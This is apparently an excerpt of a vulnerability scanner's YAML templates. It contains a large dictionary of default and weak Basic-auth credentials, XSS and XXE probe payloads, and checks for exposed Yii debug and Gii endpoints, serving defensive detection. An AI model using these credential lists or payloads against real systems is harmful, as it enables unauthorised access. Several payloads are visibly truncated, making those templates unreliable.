c3VwcG9ydDphZG1pbjEy" #support:admin12 1629 | - "BASIC c3VwcG9ydDphZG1pbjEyMw==" #support:admin123 1630 | - "BASIC c3VwcG9ydDphZG1pbjEyMzQ1Ng==" #support:admin123456 1631 | - "BASIC c3VwcG9ydDphZG1pbmlzdHJhdG9y" #support:administrator 1632 | - "BASIC c3VwcG9ydDphbHBpbmU=" #support:alpine 1633 | - "BASIC c3VwcG9ydDphc2QxMjM=" #support:asd123 1634 | - "BASIC c3VwcG9ydDphc2Rm" #support:asdf 1635 | - "BASIC c3VwcG9ydDphc2RmMTIzNA==" #support:asdf1234 1636 | - "BASIC c3VwcG9ydDphc2RmZ2g=" #support:asdfgh 1637 | - "BASIC c3VwcG9ydDpjZW50b3M=" #support:centos 1638 | - "BASIC c3VwcG9ydDpjaGFuZ2VtZQ==" #support:changeme 1639 | - "BASIC c3VwcG9ydDpjaXNjbw==" 
#support:cisco 1640 | - "BASIC c3VwcG9ydDpjaXNjbzEyMw==" #support:cisco123 1641 | - "BASIC c3VwcG9ydDpkZWZhdWx0" #support:default 1642 | - "BASIC c3VwcG9ydDppZGMhQA==" #support:idc!@ 1643 | - "BASIC c3VwcG9ydDpqaWFtaW1h" #support:jiamima 1644 | - "BASIC c3VwcG9ydDpsZXRtZWlu" #support:letmein 1645 | - "BASIC c3VwcG9ydDpsaW51eA==" #support:linux 1646 | - "BASIC c3VwcG9ydDptYW5hZ2Vy" #support:manager 1647 | - "BASIC c3VwcG9ydDptYXN0ZXI=" #support:master 1648 | - "BASIC c3VwcG9ydDpvcmFjbGU=" #support:oracle 1649 | - "BASIC c3VwcG9ydDpwQCQkdzByZA==" #support:p@$$w0rd 1650 | - "BASIC c3VwcG9ydDpQQHNzdzByZA==" #support:P@ssw0rd 1651 | - "BASIC c3VwcG9ydDpwQHNzdzByZA==" #support:p@ssw0rd 1652 | - "BASIC c3VwcG9ydDpQQHNzdzByZCE=" #support:P@ssw0rd! 1653 | - "BASIC c3VwcG9ydDpwQHNzd29yZA==" #support:p@ssword 1654 | - "BASIC c3VwcG9ydDpwYTU1dzByZA==" #support:pa55w0rd 1655 | - "BASIC c3VwcG9ydDpwYXNz" #support:pass 1656 | - "BASIC c3VwcG9ydDpwYXNzdzByZA==" #support:passw0rd 1657 | - "BASIC c3VwcG9ydDpwYXNzd29yZA==" #support:password 1658 | - "BASIC c3VwcG9ydDpwYXNzd29yZDEyMw==" #support:password123 1659 | - "BASIC c3VwcG9ydDpxMXcyZTM=" #support:q1w2e3 1660 | - "BASIC c3VwcG9ydDpxMXcyZTNyNA==" #support:q1w2e3r4 1661 | - "BASIC c3VwcG9ydDpxMXcyZTNyNHQ1" #support:q1w2e3r4t5 1662 | - "BASIC c3VwcG9ydDpxYXp3c3hlZGM=" #support:qazwsxedc 1663 | - "BASIC c3VwcG9ydDpxd2UxMjM=" #support:qwe123 1664 | - "BASIC c3VwcG9ydDpxd2VyMTIzNA==" #support:qwer1234 1665 | - "BASIC c3VwcG9ydDpxd2VydHk=" #support:qwerty 1666 | - "BASIC c3VwcG9ydDpxd2VydHkxMjM=" #support:qwerty123 1667 | - "BASIC c3VwcG9ydDpyZWRoYXQ=" #support:redhat 1668 | - "BASIC c3VwcG9ydDpyb290" #support:root 1669 | - "BASIC c3VwcG9ydDpyb290MTIz" #support:root123 1670 | - "BASIC c3VwcG9ydDpyb290MTIzNA==" #support:root1234 1671 | - "BASIC c3VwcG9ydDpyb290QDEyMw==" #support:root@123 1672 | - "BASIC c3VwcG9ydDpyb290cm9vdA==" #support:rootroot 1673 | - "BASIC c3VwcG9ydDpzZXJ2ZXI=" #support:server 1674 | - "BASIC 
c3VwcG9ydDpzdXBlcnVzZXI=" #support:superuser 1675 | - "BASIC c3VwcG9ydDpzeXN0ZW0=" #support:system 1676 | - "BASIC c3VwcG9ydDpUZXN0" #support:Test 1677 | - "BASIC c3VwcG9ydDp0ZXN0" #support:test 1678 | - "BASIC c3VwcG9ydDp0ZXN0MTIz" #support:test123 1679 | - "BASIC c3VwcG9ydDp0b29y" #support:toor 1680 | - "BASIC c3VwcG9ydDp1Ym50" #support:ubnt 1681 | - "BASIC c3VwcG9ydDp1YnVudHU=" #support:ubuntu 1682 | - "BASIC c3VwcG9ydDpVc2Vy" #support:User 1683 | - "BASIC c3VwcG9ydDp1c2Vy" #support:user 1684 | - "BASIC c3VwcG9ydDp2bXdhcmU=" #support:vmware 1685 | - "BASIC c3VwcG9ydDp3ZWxjb21l" #support:welcome 1686 | - "BASIC c3VwcG9ydDp3dWJhbw==" #support:wubao 1687 | - "BASIC c3VwcG9ydDp6YXExMndzeA==" #support:zaq12wsx 1688 | - "BASIC c3VwcG9ydDp6eGN2Ym4=" #support:zxcvbn 1689 | - "BASIC c3VwcG9ydDp6eGN2Ym5t" #support:zxcvbnm 1690 | - "BASIC c3VwcG9ydDpjaGFuZ2VpdA==" #support:changeit 1691 | - "BASIC c3lzdGVtOg==" #system: 1692 | - "BASIC c3lzdGVtOiFRQVoyd3N4" #system:!QAZ2wsx 1693 | - "BASIC c3lzdGVtOiFxYXpAd3N4" #system:!qaz@wsx 1694 | - "BASIC c3lzdGVtOjAwMDA=" #system:0000 1695 | - "BASIC c3lzdGVtOjAwMDAwMA==" #system:000000 1696 | - "BASIC c3lzdGVtOjAwMDAwMDA=" #system:0000000 1697 | - "BASIC c3lzdGVtOjAwMDAwMDAw" #system:00000000 1698 | - "BASIC c3lzdGVtOjA5ODc2NTQzMjE=" #system:0987654321 1699 | - "BASIC c3lzdGVtOjA=" #system:0 1700 | - "BASIC c3lzdGVtOjE=" #system:1 1701 | - "BASIC c3lzdGVtOjI=" #system:2 1702 | - "BASIC c3lzdGVtOjM=" #system:3 1703 | - "BASIC c3lzdGVtOjQ=" #system:4 1704 | - "BASIC c3lzdGVtOjU=" #system:5 1705 | - "BASIC c3lzdGVtOjY=" #system:6 1706 | - "BASIC c3lzdGVtOjc=" #system:7 1707 | - "BASIC c3lzdGVtOjg=" #system:8 1708 | - "BASIC c3lzdGVtOjk=" #system:9 1709 | - "BASIC c3lzdGVtOjExMTE=" #system:1111 1710 | - "BASIC c3lzdGVtOjExMTEx" #system:11111 1711 | - "BASIC c3lzdGVtOjExMTExMQ==" #system:111111 1712 | - "BASIC c3lzdGVtOjExMTExMTE=" #system:1111111 1713 | - "BASIC c3lzdGVtOjExMTExMTEx" #system:11111111 1714 | - "BASIC 
c3lzdGVtOjExMjIzMw==" #system:112233 1715 | - "BASIC c3lzdGVtOjEyMTIxMg==" #system:121212 1716 | - "BASIC c3lzdGVtOjEyMw==" #system:123 1717 | - "BASIC c3lzdGVtOjEyMzEyMw==" #system:123123 1718 | - "BASIC c3lzdGVtOjEyMzMyMQ==" #system:123321 1719 | - "BASIC c3lzdGVtOjEyMzQ=" #system:1234 1720 | - "BASIC c3lzdGVtOjEyMzQ1" #system:12345 1721 | - "BASIC c3lzdGVtOjEyMzQ1Ng==" #system:123456 1722 | - "BASIC c3lzdGVtOjEyMzQ1Njc=" #system:1234567 1723 | - "BASIC c3lzdGVtOjEyMzQ1Njc4" #system:12345678 1724 | - "BASIC c3lzdGVtOjEyMzQ1Njc4OQ==" #system:123456789 1725 | - "BASIC c3lzdGVtOjEyMzQ1Njc4OTA=" #system:1234567890 1726 | - "BASIC c3lzdGVtOjEyMzRhYmNk" #system:1234abcd 1727 | - "BASIC c3lzdGVtOjEyMzRxd2Vy" #system:1234qwer 1728 | - "BASIC c3lzdGVtOjEyM2FiYw==" #system:123abc 1729 | - "BASIC c3lzdGVtOjEyM2FzZA==" #system:123asd 1730 | - "BASIC c3lzdGVtOjEyM3F3ZQ==" #system:123qwe 1731 | - "BASIC c3lzdGVtOjEyM3F3ZWFzZA==" #system:123qweasd 1732 | - "BASIC c3lzdGVtOjEycXdhc3p4" #system:12qwaszx 1733 | - "BASIC c3lzdGVtOjFlMmUzZQ==" #system:1e2e3e 1734 | - "BASIC c3lzdGVtOjFlMmUzZTRl" #system:1e2e3e4e 1735 | - "BASIC c3lzdGVtOjFxMnEzcQ==" #system:1q2q3q 1736 | - "BASIC c3lzdGVtOjFxMnEzcTRx" #system:1q2q3q4q 1737 | - "BASIC c3lzdGVtOjFxMnczZQ==" #system:1q2w3e 1738 | - "BASIC c3lzdGVtOjFxMnczZTRy" #system:1q2w3e4r 1739 | - "BASIC c3lzdGVtOjFxMnczZTRyNXQ=" #system:1q2w3e4r5t 1740 | - "BASIC c3lzdGVtOjFxYXoyd3N4" #system:1qaz2wsx 1741 | - "BASIC c3lzdGVtOjFxYXoyd3N4M2VkYw==" #system:1qaz2wsx3edc 1742 | - "BASIC c3lzdGVtOjFxYXp4c3cy" #system:1qazxsw2 1743 | - "BASIC c3lzdGVtOjFxYXpYU1dA" #system:1qazXSW@ 1744 | - "BASIC c3lzdGVtOjF3MnEhV0BR" #system:1w2q!W@Q 1745 | - "BASIC c3lzdGVtOjF3Mnczdw==" #system:1w2w3w 1746 | - "BASIC c3lzdGVtOjF3MnczdzR3" #system:1w2w3w4w 1747 | - "BASIC c3lzdGVtOjU0MzIx" #system:54321 1748 | - "BASIC c3lzdGVtOjY1NDMyMQ==" #system:654321 1749 | - "BASIC c3lzdGVtOjg4ODg4OA==" #system:888888 1750 | - "BASIC c3lzdGVtOmE=" #system:a 1751 | - "BASIC 
c3lzdGVtOmFiYzEyMw==" #system:abc123 1752 | - "BASIC c3lzdGVtOmFiY2QxMjM0" #system:abcd1234 1753 | - "BASIC c3lzdGVtOkFkbWlu" #system:Admin 1754 | - "BASIC c3lzdGVtOmFkbWlu" #system:admin 1755 | - "BASIC c3lzdGVtOmFkbWluIUA=" #system:admin!@ 1756 | - "BASIC c3lzdGVtOmFkbWluMQ==" #system:admin1 1757 | - "BASIC c3lzdGVtOmFkbWluMTI=" #system:admin12 1758 | - "BASIC c3lzdGVtOmFkbWluMTIz" #system:admin123 1759 | - "BASIC c3lzdGVtOmFkbWluMTIzNDU2" #system:admin123456 1760 | - "BASIC c3lzdGVtOmFkbWluaXN0cmF0b3I=" #system:administrator 1761 | - "BASIC c3lzdGVtOmFscGluZQ==" #system:alpine 1762 | - "BASIC c3lzdGVtOmFzZDEyMw==" #system:asd123 1763 | - "BASIC c3lzdGVtOmFzZGY=" #system:asdf 1764 | - "BASIC c3lzdGVtOmFzZGYxMjM0" #system:asdf1234 1765 | - "BASIC c3lzdGVtOmFzZGZnaA==" #system:asdfgh 1766 | - "BASIC c3lzdGVtOmNlbnRvcw==" #system:centos 1767 | - "BASIC c3lzdGVtOmNoYW5nZW1l" #system:changeme 1768 | - "BASIC c3lzdGVtOmNpc2Nv" #system:cisco 1769 | - "BASIC c3lzdGVtOmNpc2NvMTIz" #system:cisco123 1770 | - "BASIC c3lzdGVtOmRlZmF1bHQ=" #system:default 1771 | - "BASIC c3lzdGVtOmlkYyFA" #system:idc!@ 1772 | - "BASIC c3lzdGVtOmppYW1pbWE=" #system:jiamima 1773 | - "BASIC c3lzdGVtOmxldG1laW4=" #system:letmein 1774 | - "BASIC c3lzdGVtOmxpbnV4" #system:linux 1775 | - "BASIC c3lzdGVtOm1hbmFnZXI=" #system:manager 1776 | - "BASIC c3lzdGVtOm1hc3Rlcg==" #system:master 1777 | - "BASIC c3lzdGVtOm9yYWNsZQ==" #system:oracle 1778 | - "BASIC c3lzdGVtOnBAJCR3MHJk" #system:p@$$w0rd 1779 | - "BASIC c3lzdGVtOlBAc3N3MHJk" #system:P@ssw0rd 1780 | - "BASIC c3lzdGVtOnBAc3N3MHJk" #system:p@ssw0rd 1781 | - "BASIC c3lzdGVtOlBAc3N3MHJkIQ==" #system:P@ssw0rd! 
1782 | - "BASIC c3lzdGVtOnBAc3N3b3Jk" #system:p@ssword 1783 | - "BASIC c3lzdGVtOnBhNTV3MHJk" #system:pa55w0rd 1784 | - "BASIC c3lzdGVtOnBhc3M=" #system:pass 1785 | - "BASIC c3lzdGVtOnBhc3N3MHJk" #system:passw0rd 1786 | - "BASIC c3lzdGVtOnBhc3N3b3Jk" #system:password 1787 | - "BASIC c3lzdGVtOnBhc3N3b3JkMTIz" #system:password123 1788 | - "BASIC c3lzdGVtOnExdzJlMw==" #system:q1w2e3 1789 | - "BASIC c3lzdGVtOnExdzJlM3I0" #system:q1w2e3r4 1790 | - "BASIC c3lzdGVtOnExdzJlM3I0dDU=" #system:q1w2e3r4t5 1791 | - "BASIC c3lzdGVtOnFhendzeGVkYw==" #system:qazwsxedc 1792 | - "BASIC c3lzdGVtOnF3ZTEyMw==" #system:qwe123 1793 | - "BASIC c3lzdGVtOnF3ZXIxMjM0" #system:qwer1234 1794 | - "BASIC c3lzdGVtOnF3ZXJ0eQ==" #system:qwerty 1795 | - "BASIC c3lzdGVtOnF3ZXJ0eTEyMw==" #system:qwerty123 1796 | - "BASIC c3lzdGVtOnJlZGhhdA==" #system:redhat 1797 | - "BASIC c3lzdGVtOnJvb3Q=" #system:root 1798 | - "BASIC c3lzdGVtOnJvb3QxMjM=" #system:root123 1799 | - "BASIC c3lzdGVtOnJvb3QxMjM0" #system:root1234 1800 | - "BASIC c3lzdGVtOnJvb3RAMTIz" #system:root@123 1801 | - "BASIC c3lzdGVtOnJvb3Ryb290" #system:rootroot 1802 | - "BASIC c3lzdGVtOnNlcnZlcg==" #system:server 1803 | - "BASIC c3lzdGVtOnN1cGVydXNlcg==" #system:superuser 1804 | - "BASIC c3lzdGVtOnN5c3RlbQ==" #system:system 1805 | - "BASIC c3lzdGVtOlRlc3Q=" #system:Test 1806 | - "BASIC c3lzdGVtOnRlc3Q=" #system:test 1807 | - "BASIC c3lzdGVtOnRlc3QxMjM=" #system:test123 1808 | - "BASIC c3lzdGVtOnRvb3I=" #system:toor 1809 | - "BASIC c3lzdGVtOnVibnQ=" #system:ubnt 1810 | - "BASIC c3lzdGVtOnVidW50dQ==" #system:ubuntu 1811 | - "BASIC c3lzdGVtOlVzZXI=" #system:User 1812 | - "BASIC c3lzdGVtOnVzZXI=" #system:user 1813 | - "BASIC c3lzdGVtOnZtd2FyZQ==" #system:vmware 1814 | - "BASIC c3lzdGVtOndlbGNvbWU=" #system:welcome 1815 | - "BASIC c3lzdGVtOnd1YmFv" #system:wubao 1816 | - "BASIC c3lzdGVtOnphcTEyd3N4" #system:zaq12wsx 1817 | - "BASIC c3lzdGVtOnp4Y3Zibg==" #system:zxcvbn 1818 | - "BASIC c3lzdGVtOnp4Y3Zibm0=" #system:zxcvbnm 1819 | - "BASIC 
c3lzdGVtOmNoYW5nZWl0" #system:changeit 1820 | - "BASIC YnZ0ZWNoOjIwMTQwODA4"

# Detection: a request carrying one of the Basic-auth payloads above is reported
# when the response status is 200.
# NOTE(review): a 200 status alone does not show that the credentials were
# checked; an endpoint that never required authentication would answer 200 too.
# The sections that select which requests are tested sit above this excerpt;
# confirm they limit the rule to requests that actually use Basic authentication.
detect:
  - response:
    - status: 200

# Report metadata attached to a finding.
# Remediation note for report readers: besides stronger passwords, removing
# vendor default accounts and rate limiting or locking out repeated failures on
# the Basic-auth endpoint reduce exposure to this class of finding.
meta-info:
  - title: "Weak basic authentication credentials"
  - type: auth
  - threat: 70
  - description: >
      This vulnerability is due to the use of predictably paired logins/passwords when accessing the service from the internet.
      Do not use weak passwords, which are short, default, common or easy to guess.
  - tags:
    - http_auth
--------------------------------------------------------------------------------
/xss-html-injections.yaml:
--------------------------------------------------------------------------------
# HTML/JS injection probe: payloads built around STR_MARKER are sent with the
# `replace` method and the response is inspected as HTML.
# NOTE(review): several payloads below are empty or truncated in this listing;
# their markup appears to have been stripped when the page was extracted.
# Compare with the repository copy before relying on this file.
generate:
  - payload:
    - "'STR_MARKER><"
    - '"STR_MARKER><'
    - '

      '
    - '%3CSTR_MARKER%3E'
    - "'\"STR_MARKER=x"
    - "1 ''\"\\''\" STR_MARKER=1 "
    - ''
    - ''
    # js injections
    - 'STR_MARKER'
    - "'\";\n/**/;STR_MARKER=1;/*"
    - "';\n/**/;STR_MARKER=1;//"
    - "\n/**/;STR_MARKER=1;/*"
    - "\n/**/;STR_MARKER=1;//"
  - method:
    - replace

# Response checks: only HTML responses are considered (strict_type: html); the
# last entry looks for an href of the form javascript:STR_MARKER().
# NOTE(review): nesting below is reconstructed from a flattened listing, and the
# empty `body: ''` pattern looks like another extraction casualty; verify both.
detect:
  - response:
    - strict_type: html
    - body:
      - html
    - body: ''
    - body:
      - html:
        - href:
          - 'javascript:STR_MARKER\(\)'

# Candidate references for the TODO: CWE-79, WASC-8, OWASP Top 10 2021 A03.
meta-info:
  - threat: 60
  - type: xss # TODO: OWASP, CWE, WASC references
--------------------------------------------------------------------------------
/xss-oob.yaml:
--------------------------------------------------------------------------------
# Out-of-band XSS check: the payload is added with the `postfix` method and a
# finding is raised when a DNS interaction is observed (oob: dns).
# NOTE(review): the payload as listed ends after the quote/bracket breakout and
# carries no DNS_MARKER, so it could not trigger the oob check as shown; the
# rest was presumably stripped during page extraction.
generate:
  - payload:
    - "'\"><"
  - method:
    - postfix
detect:
  - oob:
    - dns
# Candidate references for the TODO: CWE-79, WASC-8, OWASP Top 10 2021 A03.
meta-info:
  - threat: 60
  - type: xss # TODO: WASC, OWASP and CWE references
--------------------------------------------------------------------------------
/xxe.yaml:
--------------------------------------------------------------------------------
# XML external entity check: three literal block-scalar payloads replace the
# original value and a finding is raised on a DNS interaction (oob: dns).
# NOTE(review): the payload bodies below are remnants; the XML declarations they
# contained appear to have been stripped during page extraction.
generate:
  - payload:
    - !!str |
      x1
    - !!str |
      x1
    - !!str |
      %y;]>x2
  - method:
    - replace
detect:
  - oob:
    - dns
# Candidate references for the TODO: CWE-611, WASC-43.
# Remediation note: disable DTD / external entity resolution in the XML parser.
meta-info:
  - threat: 80
  - type: xxe # TODO: WASC, OWASP, CWE references
--------------------------------------------------------------------------------
/yii-debugger.yaml:
--------------------------------------------------------------------------------
# Exposed Yii debugger check: three fixed GET requests are sent and a finding is
# raised when the response body matches either debugger string below.
send:
  - method: 'GET'
    url: '/debug/default'

  - method: 'GET'
    url: '/debug/default/index'

  - method: 'GET'
    url: '/?r=debug/default'

# NOTE(review): detection is body-only (no status check), so any page that
# merely quotes these strings would match as well.
detect:
  - response:
    - body: '(Yii Debugger)|(yii-debug-toolbar)'

# Remediation note: load the debug module only in development configuration and
# restrict it with the module's allowedIPs setting.
meta-info:
  - type: info
  - threat: 67
  - applicable_for:
    - fast
    - scanner
  - tags:
    - Yii Debugger
    - Yiiframework
    - Infoleak
--------------------------------------------------------------------------------
/yii2-gii.yml:
--------------------------------------------------------------------------------
# Exposed Gii code generator check for Yii 2: three fixed GET requests are sent
# to Gii routes and a finding is raised when the body matches the pattern below.
send:
  - method: 'GET'
    url: '/index.php?r=gii'

  - method: 'GET'
    url: '/gii'

  - method: 'GET'
    url: '/index.php?r=gii/default/index'

# NOTE(review): the pattern ends with an escaped closing title tag but shows no
# opening tag; the opening `<title>` may have been lost when this page was
# extracted. Compare with the repository copy.
detect:
  - response:
    - body: 'Welcome to Gii<\/title>'

# Report metadata. Remediation note: Gii is a development tool, so keep the
# module out of production configuration or limit access with its allowedIPs
# setting, as the description below asks.
meta-info:
  - title: "Gii Extension for Yii 2"
  - description: "This extension provides a Web-based code generator for Yii framework 2.0 applications. It should be accessible only from the whitelist of allowed IP addresses"
  - additional: "Also in this module may contain possible remote code execution via an unescaped parameter in 'generateString' function. For more information see https://github.com/yiisoft/yii2-gii/issues/433"
  - type: info
  - threat: 75
  - applicable_for:
    - fast
    - scanner
  - tags:
    - Yii2
    - Yii2 Gii
--------------------------------------------------------------------------------